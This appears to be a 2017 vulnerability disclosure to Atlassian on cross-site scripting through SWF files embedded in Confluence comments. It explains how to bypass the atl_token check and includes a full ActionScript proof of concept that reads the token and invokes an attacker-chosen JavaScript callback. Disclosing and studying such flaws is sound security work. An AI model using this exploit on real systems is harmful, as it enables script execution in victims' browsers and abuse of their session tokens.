xss by swf file

Type atlassian
Reporter maradrianbelen
Modified 2017-09-04T16:55:33


In confluence comment module user can embed swf file in their comment, confluence are using a atl_token parameter on GET HTTP request, if the attacker send the link of .swf file( the value of src on embed tag) to his victim the malicious .SWF won't execute on the victim's browser .

We can bypass this protection by using this.loaderInfo.parameters in malicious .swf, this.loaderInfo.parameters.parameter_name extract the value of your target parameter, in this case it is atl_token , i also inserted a <a> tag in malicous swf file so if the victim clicks the link in our embed swf file the .swf file will be run in the victim's browser.


{code} package { import flash.display.Sprite; import flash.text.TextFormat; import flash.text.TextField; import flash.external.ExternalInterface;

public class Main extends Sprite {

public function Main() { super(); var myFormat:TextFormat = new TextFormat(); myFormat.size = 200; var xcode:String = this.loaderInfo.parameters.atl_token; var myText:TextField = new TextField(); myText.width = 1000; myText.height = 1000; myText.htmlText = "<font size=\'300px\'> <a target=\'_blank\' href=\'https://pwnie.ninja/confluence/download/attachments/9469955/NewProjectx.swf?atl_token=" + xcode + "&callback=alert\'>CliCK ME</a> </font>"; addChild(myText); ExternalInterface.call(this.loaderInfo.parameters.callback,"xss"); } } }